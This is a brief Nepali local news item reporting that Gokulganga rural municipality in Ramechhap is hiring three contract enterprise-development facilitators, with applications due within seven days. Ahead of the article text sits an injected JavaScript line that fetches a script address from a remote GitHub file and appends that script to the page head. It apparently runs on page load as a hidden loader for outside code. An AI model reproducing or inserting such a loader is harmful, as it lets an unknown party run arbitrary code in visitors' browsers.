;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर २६,
रामेछाप । रामेछापको गोकुलगंगा गाउँपालिकाले तीन जना कर्मचारी माग गरेको छ । गाउँपालिकाले एक सूचना प्रकाशन गरी उद्यम विकास सहजकर्ता करारमा सेवामा तीन जना कर्मचारी माग गरेको हो ।
जागीर खानको लागि सूचना प्रकाशन भएकोदिन देखि ७ दिन भित्र पालिकाको कार्यालयमा सम्पर्क गर्न भनिएको छ ।
सूचना हेर्नुहोस्
फेसबुक प्रतिक्रियाहरु